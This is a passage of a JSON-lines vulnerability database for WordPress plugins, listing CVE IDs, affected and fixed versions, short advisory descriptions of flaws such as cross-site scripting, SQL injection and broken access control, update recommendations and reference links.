version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea634b5-72db-428c-96b4-15ef6025ab1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea634b5-72db-428c-96b4-15ef6025ab1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/tags\\\/1.52.1\\\/modules\\\/gutenberg\\\/includes\\\/class-gutenberg.php#L224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-ads\\\/tags\\\/1.52.1\\\/modules\\\/gutenberg\\\/includes\\\/class-gutenberg.php#L224\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081914%40advanced-ads&new=3081914%40advanced-ads&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4679","slug":"wufoo-shortcode","versionEndExcluding":"1.52","description":"The Wufoo Shortcode WordPress plugin before 1.52 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c817c4af-cff2-4720-944d-c59e27544d41\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c817c4af-cff2-4720-944d-c59e27544d41\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4652","slug":"broadstreet","versionImpact":"1.51.7","versionEndExcluding":"1.51.8","description":"The Broadstreet WordPress plugin before 1.51.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 1.51.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a18ab96-ba95-4599-824f-df12e4851e6d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a18ab96-ba95-4599-824f-df12e4851e6d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6295","slug":"so-widgets-bundle","versionImpact":"1.50.1","versionEndExcluding":"1.51.0","description":"The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function\/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.","recommendation":"Update to version 1.51.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc9ed9f-55b4-43a9-a79d-c7120764f47c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc9ed9f-55b4-43a9-a79d-c7120764f47c\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7232","slug":"wp-backitup","versionImpact":"1.45","versionEndExcluding":"1.50","description":"The Backup and Restore WordPress  WordPress plugin through 1.45 does not protect some log files containing sensitive information such as site configuration etc, allowing unauthenticated users to access such data","recommendation":"Update to version 1.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/323fef8a-aa17-4698-9a02-c12d1d390763\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/323fef8a-aa17-4698-9a02-c12d1d390763\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6743","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.89","versionEndExcluding":"1.5.91","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.5.89 via the template import functionality. This makes it possible for authenticated attackers, with contributor access and above, to execute code on the server.","recommendation":"Update to version 1.5.91, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f71a19-85b1-4bc9-b193-d9de2eba81ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25f71a19-85b1-4bc9-b193-d9de2eba81ee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_output.class.php#L1765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_output.class.php#L1765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/core\\\/plugins\\\/unlimited_elements\\\/elementor\\\/elementor_widget.class.php#L3948\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/provider\\\/core\\\/plugins\\\/unlimited_elements\\\/elementor\\\/elementor_widget.class.php#L3948\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010986\\\/unlimited-elements-for-elementor#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010986\\\/unlimited-elements-for-elementor#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015166\\\/unlimited-elements-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3015166\\\/unlimited-elements-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46644","slug":"easy-sticky-sidebar","versionImpact":"1.5.8","versionEndExcluding":"1.5.9","description":"Missing Authorization vulnerability in WP CTA PRO WordPress CTA allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress CTA: from n\/a through 1.5.8.","recommendation":"Update to version 1.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-wordpress-cta-wordpress-call-to-action-sticky-cta-floating-buttons-floating-tab-plugin-plugin-1-5-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/easy-sticky-sidebar\\\/vulnerability\\\/wordpress-wordpress-cta-wordpress-call-to-action-sticky-cta-floating-buttons-floating-tab-plugin-plugin-1-5-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12109","slug":"aco-product-labels-for-woocommerce","versionImpact":"1.5.8","versionEndExcluding":"1.5.9","description":"The Product Labels For Woocommerce (Sale Badges) WordPress plugin before 1.5.9 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 1.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2eca2f88-c843-4794-8cd9-46f17c92753a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0492","slug":"gs-woocommerce-products-slider","versionEndExcluding":"1.5.9","description":"The GS Products Slider for WooCommerce WordPress plugin before 1.5.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea3b129d-32d8-40e3-b1af-8b92a760db23\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ea3b129d-32d8-40e3-b1af-8b92a760db23\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6828","slug":"arforms-form-builder","versionImpact":"1.5.8","versionEndExcluding":"1.5.9","description":"The Contact Form, Survey & Popup Form Plugin for WordPress \u2013  ARForms Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018 arf_http_referrer_url\u2019 parameter in all versions up to, and including, 1.5.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e349cae-a996-4a32-807a-a98ebcb01edd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e349cae-a996-4a32-807a-a98ebcb01edd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3013347@arforms-form-builder\\\/trunk&old=2998602@arforms-form-builder\\\/trunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3013347@arforms-form-builder\\\/trunk&old=2998602@arforms-form-builder\\\/trunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-35720","slug":"new-album-gallery","versionImpact":"1.5.7","versionEndExcluding":"1.5.8","description":"Missing Authorization vulnerability in A WP Life Album Gallery \u2013 WordPress Gallery.This issue affects Album Gallery \u2013 WordPress Gallery: from n\/a through 1.5.7.","recommendation":"Update to version 1.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-5-7-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-5-7-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8787","slug":"clover-online-orders","versionImpact":"1.5.7","versionEndExcluding":"1.5.8","description":"The Smart Online Order for Clover plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35d64d3e-b48e-4e35-ab1d-0557fcd62263?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35d64d3e-b48e-4e35-ab1d-0557fcd62263?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/moo-OnlineOrders-admin.php#L477\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/moo-OnlineOrders-admin.php#L477\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/includes\\\/class-moo-products-list.php#L572\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/clover-online-orders\\\/tags\\\/1.5.7\\\/admin\\\/includes\\\/class-moo-products-list.php#L572\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/includes\\\/class-moo-products-list.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fincludes%2Fclass-moo-products-list.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/includes\\\/class-moo-products-list.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fincludes%2Fclass-moo-products-list.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/moo-OnlineOrders-admin.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fmoo-OnlineOrders-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3168446\\\/clover-online-orders\\\/tags\\\/1.5.8\\\/admin\\\/moo-OnlineOrders-admin.php?old=3142847&old_path=clover-online-orders%2Ftags%2F1.5.7%2Fadmin%2Fmoo-OnlineOrders-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51681","slug":"duplicator","versionImpact":"1.5.7","versionEndExcluding":"1.5.7.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Duplicator Duplicator \u2013 WordPress Migration & Backup Plugin.This issue affects Duplicator \u2013 WordPress Migration & Backup Plugin: from n\/a through 1.5.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/duplicator\\\/wordpress-duplicator-plugin-1-5-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/duplicator\\\/wordpress-duplicator-plugin-1-5-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1894","slug":"burst-statistics","versionImpact":"1.5.6.1","versionEndExcluding":"1.5.7","description":"The Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'burst_total_pageviews_count' custom meta field in all versions up to, and including, 1.5.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that this exploit only functions if the victim has the 'Show Toolbar when viewing site' option enabled in their profile.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/class-frontend.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/burst-statistics\\\/tags\\\/1.5.6.1&old=3049793&new_path=\\\/burst-statistics\\\/tags\\\/1.5.7&new=3049793&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/burst-statistics\\\/tags\\\/1.5.6.1&old=3049793&new_path=\\\/burst-statistics\\\/tags\\\/1.5.7&new=3049793&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7747","slug":"woo-wallet","versionImpact":"1.5.6","versionEndExcluding":"1.5.7","description":"The Wallet for WooCommerce plugin for WordPress is vulnerable to incorrect conversion between numeric types in all versions up to, and including, 1.5.6. This is due to a numerical logic flaw when transferring funds to another user. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create funds during a transfer and distribute these funds to any number of other users or their own account, rendering products free. Attackers could also request to withdraw funds if the Wallet Withdrawal extension is used and the request is approved by an administrator.","recommendation":"Update to version 1.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-frontend.php#L407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-frontend.php#L407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145131\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145131\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd8f3eb7-ac60-46c4-b41f-5d89e3133042?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd8f3eb7-ac60-46c4-b41f-5d89e3133042?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1080","slug":"gn-publisher","versionEndExcluding":"1.5.6","description":"The GN Publisher plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018tab\u2019 parameter in versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gn-publisher\\\/trunk\\\/templates\\\/settings.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gn-publisher\\\/trunk\\\/templates\\\/settings.php#L70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7574","slug":"christmasify","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"The Christmasify! plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5.5. This is due to missing nonce validation on the 'options' function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac247d3a-9e60-431e-ac98-2601e9907758?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac247d3a-9e60-431e-ac98-2601e9907758?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132621\\\/christmasify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3132621\\\/christmasify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12263","slug":"orbisius-child-theme-creator","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cloud_delete() and cloud_update() functions in all versions up to, and including, 1.5.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete cloud snippets. Please note that this vulnerability was present in the Cloud Library Addon used by the plugin and not in the plugin itself, the cloud library has been removed entirely.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205672%40orbisius-child-theme-creator&new=3205672%40orbisius-child-theme-creator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205672%40orbisius-child-theme-creator&new=3205672%40orbisius-child-theme-creator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd0eb569-b526-48bd-8198-ff883860e040?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd0eb569-b526-48bd-8198-ff883860e040?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0710","slug":"gp-unique-id","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26db2d25-01b8-49c5-a4d6-284780ac97bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/gravitywiz.com\\\/documentation\\\/gravity-forms-unique-id\\\/\",\"name\":\"https:\\\/\\\/gravitywiz.com\\\/documentation\\\/gravity-forms-unique-id\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-0710\\\/blob\\\/main\\\/README.md\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-0710\\\/blob\\\/main\\\/README.md\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10101","slug":"google-analytics-top-posts-widget","versionImpact":"1.5.5","versionEndExcluding":"1.5.6","description":"A vulnerability classified as problematic was found in Google Analytics Top Content Widget Plugin up to 1.5.6 on WordPress. Affected by this vulnerability is an unknown functionality of the file class-tgm-plugin-activation.php. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.5.7 is able to address this issue. The name of the patch is 25bb1dea113716200a6f0f3135801d84a7a65540. It is recommended to upgrade the affected component. The identifier VDB-226117 was assigned to this vulnerability.","recommendation":"Update to version 1.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.226117\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.226117\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/google-analytics-top-posts-widget\\\/commit\\\/25bb1dea113716200a6f0f3135801d84a7a65540\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/google-analytics-top-posts-widget\\\/commit\\\/25bb1dea113716200a6f0f3135801d84a7a65540\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226117\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.226117\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4360","slug":"controlled-admin-access","versionEndExcluding":"1.5.6","description":"The Controlled Admin Access plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 1.5.5 by not properly restricting access to the configuration page. This makes it possible for attackers to create a new administrator role with unrestricted access.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ddc0a9d-c081-4bef-aa87-3b10d037379c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ddc0a9d-c081-4bef-aa87-3b10d037379c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-controlled-admin-access-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-controlled-admin-access-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c57211a-f59d-4379-b09e-7c6049a6b04d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c57211a-f59d-4379-b09e-7c6049a6b04d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/controlled-admin-access\\\/trunk\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/controlled-admin-access\\\/trunk\\\/readme.txt\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36710","slug":"wps-hide-login","versionEndExcluding":"1.5.5","description":"The WPS Hide Login plugin for WordPress is vulnerable to login page disclosure even when the settings of the plugin are set to hide the login page making it possible for unauthenticated attackers to brute force credentials on sites in versions up to, and including, 1.5.4.2.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7808329f-1688-480c-a83c-c4ab2fa86da6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7808329f-1688-480c-a83c-c4ab2fa86da6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wps-hide-login-fixed-security-issue\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-wps-hide-login-fixed-security-issue\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13407","slug":"omnipress","versionImpact":"1.5.4","versionEndExcluding":"1.5.5","description":"The Omnipress plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.5.4 via the megamenu block due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 1.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254484\\\/omnipress\\\/trunk\\\/includes\\\/Blocks\\\/BlockTypes\\\/Megamenu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254484\\\/omnipress\\\/trunk\\\/includes\\\/Blocks\\\/BlockTypes\\\/Megamenu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa17f78a-5e4a-441e-bbbb-d13bad648c39?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa17f78a-5e4a-441e-bbbb-d13bad648c39?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2661","slug":"barcode-scanner-lite-pos-to-manage-products-inventory-and-orders","versionImpact":"1.5.4","versionEndExcluding":"1.5.5","description":"The Barcode Scanner and Inventory manager. POS (Point of Sale) \u2013 scan barcodes & create orders with barcode reader. plugin for WordPress is vulnerable to blind SQL Injection via the \u2018currentIds\u2019 parameter in all versions up to, and including, 1.5.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with subscriber access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.5, or a newer patched 